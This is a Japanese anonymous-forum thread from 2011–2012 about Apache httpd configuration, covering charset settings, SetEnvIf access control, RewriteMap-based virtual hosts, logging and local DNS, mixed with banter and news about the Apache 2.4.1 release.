678 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 16:42:08.96 ]: わからねーのかよ使えねーなクソ
679 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 17:43:43.89 ]: >>678
tcpのセッションの話とapacheのタイムアウトは別物。
680 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 19:20:35.40 ]: コマンド手打ちしたいけどタイピングが超遅いのであろう
681 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/23(日) 10:39:49.42 ]: 先日サーバをレンタルしたのですが
ページ自体が自分の期待する文字コードでファイルを返してくれません。

具体的には、　hoge.html というhtmlページは shift-jis で記述しており
shift-jisで閲覧される事を想定しているのですが、utf-8としてコンテンツが吐き出されている様です。

たとえば、下記の様な特定のディレクトリにあるファイルのみ（←重要★）
文字コードを変更するにはどうすればよいでしょうか？
hoge_dir/hoge/
hoge_1.html
hoge_2.html
682 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/23(日) 12:09:59.37 ]: <Directory ...>
AddDefaultCharset ...
</Directory>
683 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/23(日) 12:59:36.51 ]: >>682
次の２パターンを試してもやはり駄目でした。どこに問題があるのでしょうか？

hoge_dir/hoge/
　.htaccess
　hoge_1.html
　hoge_2.html

【.htaccessの設定】
その①
<Directory .>
AddDefaultCharset Shift_JIS
</Directory>

その②
AddType "text/html; charset=Shift_JIS" sjis
684 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/23(日) 13:13:27.27 ]: ><Directory .>

アホか。よく考えろ。
685 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/23(日) 13:18:15.60 ]: >>684

そもそも <Directory>はhttpd.cnf とかにしか指定出来ないのではないでしょうか？

うーん文字化けしてしまう。
html　⇒　php にして文字コードを指定すれば文字化けしないんですけど・・・
686 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/23(日) 18:50:21.11 ]: HTMLヘッダーとHTTPヘッダーと両方確認した？
687 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/24(月) 02:40:40.53 ]: AddType "text/html; charset=Shift_JIS" html
とかじゃないの

そのhtmlをUTF-8にするのはだめなん？
688 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/24(月) 14:17:58.37 ]: >>687
AddCharsetというディレクティブもあることも知らずに回答者気取りとかｗｗ
689 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/24(月) 14:35:40.54 ]: スレ維持乙
690 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/25(火) 05:37:52.42 ]: デフォルトチャーセットってノンに出来ないっけ？
こんなの設定してる鯖屋は萎えるな。
691 名前：名無しさん＠お腹いっぱい。 [2011/10/26(水) 05:19:30.01 ]: 二つのhttpd.confを比較して、
設定の差分をリストアップするようなソフトがあればおしえてください
692 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 05:27:59.24 ]: >>691
ん？こーゆーの？
www.geocities.co.jp/SiliconValley-SanJose/8165/winmerge.html
693 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 08:28:10.87 ]: >>691
diffコマンド
694 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 10:31:02.56 ]: >>693
ちゃんと-uつけろよ？
695 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 14:24:34.91 ]: >>690
AddDefaultCharset noneって見ただけで笑えるよねｗ
noneって設定値はcharset=noneの設定だからｗ
696 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 20:56:51.64 ]: ノンじゃなくてオフならあるぜ
697 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 21:05:11.46 ]: ナン、て中学校で習ったな
698 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 22:01:20.31 ]: おフランス風ざますのよ
699 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 22:16:13.59 ]: うぃ
700 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/26(水) 23:51:55.89 ]: ぐぐるな
701 名前：名無しさん＠お腹いっぱい。 [2011/10/27(木) 10:28:11.25 ]: 管理用のIPアドレスからアクセスしてきたら環境変数をセット
その環境変数があれば、指定のディレクトリへのアクセスを許可
ということをやりたいのですが、
環境変数を元にallowするにはどうすればいいですか？
702 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/27(木) 10:32:12.13 ]: >>701
っ SetEnvIf
703 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/27(木) 10:33:39.14 ]: または、類似の方法があれば教えてください
管理用のIPアドレス表記があちこちにあるのを避けたいんです
704 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/27(木) 10:34:29.90 ]: >>702
ありがとうございます。
SetEnvIfを使って、環境変数のセットをするところまではきたのですが
その先がわからないんです・・
705 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/27(木) 10:44:03.98 ]: アクセスコントロールしたいコンテンツをまとめるとか
.htaccessをリンクで増やして実体は一つにするとか
706 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/27(木) 10:47:43.34 ]: Allow from all|host|env=env-variable [host|env=env-variable] ...
707 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/27(木) 11:00:51.75 ]: >>706
あーこれです！
ありがとうございました
708 名前：名無しさん＠お腹いっぱい。 [2011/10/27(木) 11:57:06.57 ]: mod_layoutってなくなりました？
www.tangent.org/
ここが開発元っぽいけど情報がない
709 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/27(木) 12:17:13.00 ]: ただのしかばねのようだ
hg.tangent.org/
710 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/27(木) 14:10:12.36 ]: >>709
ありがとうございます
日付的に更新とまってるのかな？
711 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/29(土) 23:57:40.29 ]: mod_layoutを必要とするようなサービスは時代の流れから反してるからね
712 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/31(月) 23:15:51.05 ]: 質問させて頂きます。
httpd.confで、VirtualHostを設定しているのですが、
複数のドメインのサブドメインをアスタリスク等で一度に設定できますか？

例えば
hoge.comの場合
www.hoge.com → DocumentRoot /home/hoge/www/
aaa.hoge.com → DocumentRoot /home/hoge/www2/
bbb.hoge.com → DocumentRoot /home/hoge/www3/

hoge.jpの場合
www.hoge.jp → DocumentRoot /home/hoge/www/
aaa.hoge.jp → DocumentRoot /home/hoge/www2/
bbb.hoge.jp → DocumentRoot /home/hoge/www3/

違うドメインですが、
サブドメインが一緒の場合、同じDocumentRootにしたいのです。

一つ一つ設定するよりも、正規表現ぽく設定したいのですが・・
よろしくおねがいします。
713 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/31(月) 23:21:29.40 ]: hoge.comの中の人ってhoge.jpの管理者と同じ日本人だったのか・・
714 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/01(火) 00:23:48.73 ]: >>712
vhost_alias
715 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/01(火) 00:29:21.32 ]: hoge.jp は私の持っているドメインです。勝手に例示に使わないでください。
716 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/01(火) 00:43:50.98 ]: >>714
717 名前：712 mailto:sage [2011/11/01(火) 00:47:15.07 ]: >>714
ありがとうございます。
調べてみたら、mod_vhost_alias は
aaa.hoge.com → /home/hoge/aaa/
bbb.hoge.com → /home/hoge/bbb/
としかできないんですよね？
aaa.hoge.com → /home/hoge/www1/
bbb.hoge.com → /home/hoge/www1/
ccc.hoge.com → /home/hoge/www2/

のようには、難しいですかね？
718 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/01(火) 00:53:43.55 ]: ServerAlias
719 名前：712 [2011/11/01(火) 01:02:53.21 ]: >>718
>>712に書いてあるような、hoge.comやhoge.jp等々の設定は、
ドメインごとに設定をしなければならないってことですかね。
ドメイン横断でVirtualHostをすること自体が間違っているんですかね？
720 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/01(火) 09:53:24.66 ]: 自分で設定しないとしたら
どういう基準で判断させるつもり?
721 名前：720 mailto:sage [2011/11/01(火) 09:54:37.52 ]: あーすまん、読み違えてた。
722 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/01(火) 10:30:13.26 ]: >>717
やろうと思えばできるかもしれんが、正規表現ぽく簡単には無理かも。
とりあえずは、www1とかをサブドメインにしておけばやりたいことは
達成できるんじゃないの？
723 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/01(火) 10:31:59.13 ]: 手で書けないほど持ってるドメイン多いのかな。
ならスクリプトとかで生成しちゃえば。

あとおやくそくの注意だけど
実在するドメイン名を例に使っちゃいかんよ。
724 名前：712 [2011/11/01(火) 11:24:08.65 ]: >>722 >>723
ありがとうございます。
手でかけないほどじゃないですが、新しいドメインを運用する際に、
apacheのconfをいじりたくは無かったので、聞いて見ました。
個別に設定することにします。

今後はexample.comとかにします。
725 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/01(火) 20:00:24.72 ]: >>724
mod_rewrite
726 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 05:45:31.42 ]: >>712
ちょっと興味があって、で思ったより簡単にできたので紹介
※ 長文注意

* httpd.conf(一部省略、log は確認の為とりあえず 10、本運用では 0 に)
※ ServerName は wildcard 使えないはず(未確認)。
※ セキュリティ面の考慮はしてないです。何か問題あるかも
※ RewriteMap はファイルを変更すると即時(apacheの再起動など無く)反映されます。
<VirtualHost *:80>
ServerAdmin webadmin
DocumentRoot /var/www/example/base/
ServerName example.com
ServerAlias *.example.com
ServerAlias *.example.net
RewriteEngine on
RewriteLog "/var/log/httpd/example_rewrite_log"
RewriteLogLevel 10
RewriteMap doc_map txt:/etc/apache/map.txt
RewriteCond %{HTTP_HOST} ^([^.]+).example.(com|net)$
RewriteRule ^/(.*)$ /var/www/example/${doc_map:%1}/$1 [L]

* /etc/apache/map.txt
www www
aaa www2
bbb www3

次に続く
727 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 05:48:04.13 ]: 続き

* directory
$ head /var/www/example/*/*.html
==> /var/www/example/base/index.html <==
base
==> /var/www/example/www/index.html <==
www
==> /var/www/example/www2/index.html <==
www2
==> /var/www/example/www3/index.html <==
www3

* result
$ curl -H 'Host: example.com' localhost/index.html
base
$ curl -H 'Host: www.example.com' localhost/index.html
www
$ curl -H 'Host: aaa.example.com' localhost/index.html
www2
$ curl -H 'Host: bbb.example.com' localhost/index.html
www3
$ curl -H 'Host: ccc.example.com' localhost/index.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
略
=> rewrite_log より /var/www/example//index.html へアクセスしていることを確認
728 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 10:01:58.49 ]: いやいや、こういうのをやらずに簡単にやる方法ってことなんだが
729 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 10:23:28.72 ]: 実質5行だが、これで簡単でないって頭大丈夫か？
730 名前：712 [2011/11/02(水) 10:48:05.47 ]: >>727
ありがとうございます。
なるほど。RewriteEngineでやっちゃうって感じですね。
これだと、サブドメインの追加はconfをいじらないですみますが、
example1.comとかを追加する場合は、confをいじらないとって感じですね。
かなり参考になりそうなので、ちょっといじってやってみます！
ありがとうございます！
731 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 11:02:26.52 ]: >>726
> ※ RewriteMap はファイルを変更すると即時(apacheの再起動など無く)反映されます。
つまり1アクセス毎にファイル読んでるってことだよね。大丈夫なのかな。
732 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 12:45:16.00 ]: ケチるける前にドキュメント読めよ。カス。
733 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 13:19:48.80 ]: ケチるける？
.htaccess は1アクセスごと再帰的に読まれてファイルアクセスが増えるから重くなるとはいうね。
例えば example.jp/foo/bar/baz/qux/foobar/index.html っていうファイルにアクセスする場合、
/docroot/foo/.htaccess, /docroot/foo/bar/.htaccess, ... と1回のアクセスで最大5個の .htaccess が読まれる。
よっぽど大量じゃないとパフォーマンスに影響しないだろうけど。

知らんけどRewriteMapも即時に反映されるなら毎回読んでるのかも。
734 名前：忍法帖【Lv=17,xxxPT】 mailto:sage [2011/11/02(水) 13:20:53.42 ]: 斜めに受け取りすぎじゃないか？
ただ疑問に思ってるだけでケチつけてるわけじゃないだろ。
735 名前：733 mailto:sage [2011/11/02(水) 13:23:14.09 ]: ごめんなさい
736 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 14:47:52.41 ]: だからドキュメント嫁って言ってんだろ。カス。
Note
For plain text and DBM format files the looked-up keys are cached
in-core until the mtime of the mapfile changes or the server does a
restart. This way you can have map-functions in rules which are used
for every request. This is no problem, because the external lookup
only happens once!
737 名前：726 mailto:sage [2011/11/02(水) 15:30:27.02 ]: どのようにファイルが参照されるかは 736 が貼ってくれてるから、
RewriteMap txt: を実運用サイトで使ってる身としての意見や
経験をちょっとだけ

導入当初(4年ぐらい前)にベンチを取ったけど、
「1台で 200pv/sec 程度の ab を使ったテスト」を行い、
100行ぐらいの RewriteMap txt: あり/なしで差が出なかった。

実運用に入ってからも上に乗るアプリのほうが Apache なんかよりも
よっぽど重いので正直わからない。
それより、ファイルを変更したら即座に反映されることのほうが
運用する上ではよっぽど怖い。
738 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/02(水) 23:56:54.16 ]: >>729
お前こそ頭大丈夫か？マップとか逐次設定増やす必要あるだろ。
性能も悪いし効率も悪い。
739 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/03(木) 08:33:31.65 ]: >>738
お前、本物の知障だろ。どんなに頭悪いのかは足りない頭で考えろ。ｗｗ
しかも>>737が性能効率には全く影響なかったといった後でその発言。ｗｗｗ
740 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/03(木) 10:49:36.62 ]: >>739
おまえやっぱ素人臭いな。100行程度の評価でうれしそうだし、逐次設定なんて誰でもできる。
あんな設定で俺すげーされたらかなわんわ。
黙ってた方がいいよ、頭も悪そうだし。
741 名前：名無しさん＠お腹いっぱい。 [2011/11/03(木) 10:55:17.93 ]: >>740
その、誰でもできる設定を「簡単じゃない」と言い出した知障(>>728)がお前。ｗｗｗ
742 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/03(木) 12:45:34.81 ]: >>741
強引にrewrite使えば誰でもできるけど、もっと簡単にやる方法がないかってのを聞いてるんでしょってこと。
お前どうしたの？そんなに認められないのが苦痛？
743 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/03(木) 12:49:48.24 ]: プログラマっていうのは怠けるために最大の努力をするのが正しい姿

それに反してるってことだろ?
744 名前：名無しさん＠お腹いっぱい。 [2011/11/04(金) 08:12:59.07 ]: 俺が知ってるのは
プログラマは手抜きをするためならいかなる努力も厭わない
だ
745 名前：名無しさん＠お腹いっぱい。 [2011/11/09(水) 19:10:57.26 ]: rapid siteのVPSを借りたのですが、
どの行にもerror_logの後部にreferrerがついてしまいます
調べてみたのですが、外し方が分かりません
エラーログが見づらいので、助けてください！
746 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/09(水) 19:12:23.88 ]: >>745
httpd.conf の ErrorLog はどう書いてんの。
747 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/09(水) 19:13:27.64 ]: つーかこっちで聞いた方がいい。
hibari.2ch.net/hosting/
748 名前：745 [2011/11/09(水) 19:13:54.59 ]: >>746
ErrorLogは
ErrorLog logs/error_log
こんなかんじです
749 名前：745 [2011/11/09(水) 19:16:12.27 ]: >>747
rapid siteのスレが・・・まぁ人が少なそうだったので・・・
すいませんｗおじゃましてみましたｗ
750 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/10(木) 00:54:37.03 ]: customlog
751 名前：745 [2011/11/10(木) 11:54:33.12 ]: 調べてみたんですが、
エラーログのフォーマットってcustomlogで設定できないっぽいのですが
752 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/11(金) 16:11:55.02 ]: >>751
逆逆。CustomLogを使ってエラーログを吐かせるの。
753 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/11(金) 16:52:00.54 ]: >>752
そんなことできるの？
754 名前：745 [2011/11/11(金) 19:15:52.31 ]: >>752
あ、エラーログと別に、デバッグログとして吐き出すってことですね。
普通のエラーログに出るようなWarning等々も吐き出せるってことですよね。
ちょっと調べてみます！
755 名前：名無しさん＠お腹いっぱい。 [2011/11/12(土) 10:08:35.97 ]: apacheなのかdnsなのか別の範囲なのかわからないんですが
自宅のLanの中にサーバを立ち上げて、
test1.myserv.com / test2.myserv.comという風にバーチャルホストでサイトを作っています
で、クライアントのマシンではhostsを弄ってドメインでブラウザからアクセスできるようにしています

ところが、hostsを触れない端末があり（iPod touchですが）、アクセスできなくて困っています
どうやって解決したら良いでしょうか？
アドバイスもらえると嬉しいです、よろしくお願いします
756 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/12(土) 10:26:04.88 ]: そりゃDNS立てるしかないだろ
そんなの初心者スレで質問する内容だ
757 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/12(土) 10:29:39.19 ]: >>755
apache関係ないな。

dnsmasqおすすめ。
5行位書けば設定可能。
hostsも見てくれるので、楽。

で、すべての機器はそのDNSを参照する。

dhcpdもついてるよ。
758 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/12(土) 10:30:44.33 ]: myserv.comの中の人ってこの程度の知識だったのか…
759 名前：名無しさん＠お腹いっぱい。 [2011/11/12(土) 13:08:07.49 ]: >>756,757
apacheで対応できることじゃないですね、すみませんでした
dnsmasqっての調べてみます
ありがとうございました！
760 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/12(土) 13:16:06.00 ]: >>758
ネタだよねソレ？
761 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/12(土) 14:20:10.97 ]: 勝手に他人のドメイン名乗ってるって皮肉だろ
762 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/12(土) 14:34:35.47 ]: DDNSじゃねぇのかよ
763 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/13(日) 22:24:26.61 ]: DDNSが何なのか判ってるの？
764 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/14(月) 01:32:11.96 ]: 判ってるよ？
765 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/14(月) 03:15:22.29 ]: >>763
どわいなみっくどぅおめいんすわぁーびす
766 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/14(月) 04:21:26.82 ]: 「ぬぇ～む」が抜けてる
767 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/28(月) 21:45:59.73 ]: アナルプラグ
768 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/11/29(火) 22:17:48.68 ]: うほ
769 名前：名無しさん＠お腹いっぱい。 [2011/12/17(土) 21:52:43.33 ]: apache 2.4が正式にリリースされるのっていつ頃だろうね？
770 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/12/17(土) 23:52:37.75 ]: Apache 3.0構想発表 - 抜本的性能向上へ
news.mynavi.jp/news/2007/02/16/364.html
771 名前：名無しさん＠お腹いっぱい。 [2011/12/18(日) 03:58:14.80 ]: >>770
いつのニュースだよ
772 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/12/18(日) 17:03:35.47 ]: Apache 3.0の構想は永久に実現しないのかｗ
773 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/27(金) 05:21:05.72 ]: 2.3は何時出るんだよ。
774 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/27(金) 05:36:17.60 ]: [RESCINDED ]Re: [VOTE] Release Apache httpd 2.4.0

On Sunday 22 January 2012, Jim Jagielski wrote:
> I am rescinding the vote for 2.4.0. Instead, on Monday (or
> Tuesday at the latest) I will T&R 2.4.1.

Plese wait until at least the core output filter issue is completely
resolved. Thanks.
775 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/29(日) 01:55:04.59 ]: httpd.confがまじうざい
servertokens profが有効化されないし
cssフォルダのcssファイルにアクセス権限がないためアクセス出来ませんっていわれるし
もうわけわかめ
776 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/29(日) 02:27:36.01 ]: 修行が足りませんねｗ
777 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/29(日) 02:42:32.87 ]: うざいなら消しちゃえばいいじゃん。
778 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/29(日) 13:16:44.84 ]: 2.2で困っていない

っていうか仕事が増えるから2.4出さないでくれ
779 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/29(日) 15:18:25.41 ]: cssフォルダの権限がrootになってたため起こったエラーでした
指定したユーザーに権限渡したらすんなりと動きました
780 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/30(月) 08:25:36.26 ]: 権限の話なのになんでhttpd.confのせいだと思ったんだ。
781 名前：名無しさん＠お腹いっぱい。 [2012/01/31(火) 13:39:52.43 ]: >>775
てか、Apache を使うのをやめたらどう？
782 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/31(火) 13:42:03.07 ]: この調子だと他の使ったらうまくいくってわけでもなさそうだから
サーバ管理をやめた方がいいかも。
783 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/01/31(火) 20:25:35.30 ]: >778
むしろ仕事がなくなるぞ
784 名前：名無しさん＠お腹いっぱい。 [2012/02/01(水) 18:29:24.20 ]: 2.2.22 age
785 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/11(土) 12:03:56.95 ]: apache httpd も下り坂なのかな？

Nginx強く成長、Webサーバとして確固たるポジションに - Netcraft
news.mynavi.jp/news/2012/02/09/028/index.html

人気急増の高速WebサーバーNginx、商用サポートサービスがスタート
sourceforge.jp/magazine/12/02/10/042249
786 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/11(土) 13:13:15.49 ]: >>785
静的コンテンツを配信する軽くて高速なhttpdと、動的コンテンツ用の高機能だけど
重いhttpdとで分化してきているってだけの話
787 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/11(土) 13:57:05.52 ]: Damien Katz氏がApache CouchDBから離反し、Couchbase Server開発を継続
www.infoq.com/jp/news/2012/01/Katz-CouchDB-Couchbase-Server
> 氏はこの製品を“絶対にApacheプロジェクトにはしない”としている。氏によると理由は、
> “コンセンサスを取りながら開発する方法がプロジェクトの競争力を制限してしまう地点に
> 到達した"からだ。

> InfoQ: あなたは、Apacheプロジェクトの動きは遅く、必ずしも競争力のある製品を生まない、
> と言っているように思います。Apacheの主な問題は何ですか。

> DK: 私たちは顧客やユーザの声に敏感に反応する必要があります。
> しかし、Apacheプロジェクトのやり方だとそれが困難だと分かりました。
> コードの同期を維持し続けるのはとても大変でした。
788 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/11(土) 15:27:37.17 ]: それがどうかしたの？
789 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/11(土) 16:17:23.99 ]: > On 09 Feb 2012, at 4:03 PM, Jim Jagielski wrote:
>
> > A heads up that I plan to T&R 2.4.1 within the next 48hrs...
> > Why 48hrs? To give people who might either have patches/backports
> > time to fold them in, as well as give people who may not support
> > a T&R time to note their disagreement and provide valid reasons
> > behind it.
>
790 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/11(土) 16:30:13.96 ]: 独非営利団体がOpenOffice.orgベースの「White Label Office」を公開、Apacheはこれに対し協調を呼びかけ
sourceforge.jp/magazine/11/12/27/045229

> 現在ASFの元でインキュベーションプロジェクトとして運営されている。
> その間、OpenOffice.orgの一部の開発者がフォークプロジェクト
> 「LibreOffice」（The Document Foundation）を設立、OpenOffice.orgは求心力を失ったと見る向きもある。

LibreOfficeの連中はapacheとはもう関わりたくないってさｗ
791 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/11(土) 23:19:12.52 ]: 787=790=とんでもないバカ、かつ包茎
792 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/12(日) 00:21:54.62 ]: >>790
LibreOfficeがOpenOfficeからフォークしたのはOpenOfficeがASFに託される前だろ
793 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/13(月) 07:11:57.16 ]: VirtualHostの設定をSQLiteなどに格納する方法はないんでしょうか？
794 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/18(土) 11:19:06.31 ]: > As such, I call the vote as PASSING and that httpd 2.4.1 will
> be released as GA.
795 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/20(月) 13:20:34.66 ]: >>793
やればできる。
796 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/20(月) 18:46:33.83 ]: そういうモジュールがある。
797 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/20(月) 23:18:58.83 ]: 作ればあるもん
798 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/21(火) 10:23:44.67 ]: だよもん
799 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/21(火) 22:29:25.14 ]: Apache httpd 2.4.1 Released
The Apache HTTP Server Project is pleased to announce
www.apache.org/dist/httpd/Announcement2.4.html
800 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/22(水) 23:04:13.20 ]: 「Apache HTTP Server 2.4.1」公開、6年ぶりの新たな安定版
internet.watch.impress.co.jp/docs/news/20120222_513656.html
801 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/23(木) 01:53:38.89 ]: Apache 2.4.1のスループット評価（旧ApacheとNginxとのベンチマーク比較）
blog.matsumoto-r.jp/?p=1812

>いずれにせよ、Apache2.4.1は大きく性能改善がなされ、大量のアクセスが来た場合の処理耐性はnginxよりも良いということになる。
802 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/02/23(木) 02:19:34.50 ]: aptで突っ込めるようになるのまだー
803 名前：名無しさん＠お腹いっぱい。 mailto:age [2012/03/02(金) 16:30:32.82 ]: PHP 5.4 がついにリリース ― Web を高速に！
804 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/03(土) 23:16:21.45 ]: aprは別で単独でインストールしろという事になったのか。
805 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/03(土) 23:31:22.99 ]: apache 2.4.1にしてもPHP 5.4にしても、Windows用のmsi版作ってほしいー
ほんと、まじでお願いします
806 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/03(土) 23:34:25.62 ]: 公式64ビットwindowsパイナリが欲しい
807 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/04(日) 01:21:04.09 ]: Migu 1mはわかりやすいなあ。パ(pa)イナリってなんだろ。
808 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/04(日) 09:57:26.97 ]: Apache2.2.22で質問
OptionsでIndexesを無効にし、DirectoryIndexにindex.htmlを指定している場合
URLが末尾/で終わったアクセスをした時にindex.htmlがなかったら403ではなく404を返したい。
つまり

hoge.com/img/
にアクセスした時に
hoge.com/img/index.html
がなかったらForbidenじゃなくてNot Foundを返答したい。

普通は403なんだろうけど…
809 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/04(日) 20:27:31.46 ]: RedirectMatch 404 /$
810 名前：808 mailto:sage [2012/03/04(日) 22:05:34.43 ]: >>809
この手もあったか
取り敢えず>>808の書き込みの後調べてみて

1.mod_autoindex.soを読み込まないようにする
2.OptionsでIndexesを有効にする。

と設定することで「オートインデックスの作成は許可するが機能は無効」になるので
Not Foundになったけど…。
811 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/04(日) 23:28:33.94 ]: エラーログが出ない方法が正解。
812 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/05(月) 10:17:31.83 ]: mod_dir をロードしない。
813 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/05(月) 10:23:29.96 ]: RFCを書き換えて403と404を入れ替える。
814 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/22(木) 03:32:53.11 ]: OpenSSL 1.0.1 出てるな
TLS v1.1 v1.2 サポートされるから入れとけよ
815 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/27(火) 11:05:21.92 ]: Indexesで表示されるファイルリストを Content-Type: text/html; charset=UTF-8で表示したい
のだけどどうすればいいでしょうか？
使ってるApacheはCentOS 5.8 でrpmで入るもので、httpd-2.2.3-63.el5.centos.1 です。

.htaccess に AddDefaultCharset UTF-8 とか書いてみても効かない様で、現在は
Content-Type: text/html; charset=iso-8859-1
になっています。
816 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/27(火) 11:27:12.41 ]: >> 815

IndexOptions Charset=UTF-8
817 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/28(水) 03:01:46.58 ]: >>816
㌧
818 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/03/28(水) 14:48:53.59 ]: >>815-817
状況によっては、こっちのほうがいいかもね。
IndexOptions +Charset=UTF-8
819 名前：名無しさん＠お腹いっぱい。 mailto:sage [2012/04/09(月) 10:22:04.59 ]: すまん、教えてくれ。
apacheで大量のコンテンツを処理する必要があるんだけど、
画像コンテンツは転送が完了するまでapacheのMaxClientsを消費するんだろうか？
ユーザが遅い回線で見てたらMaxClientsはどんどん消費されるんだろうか？
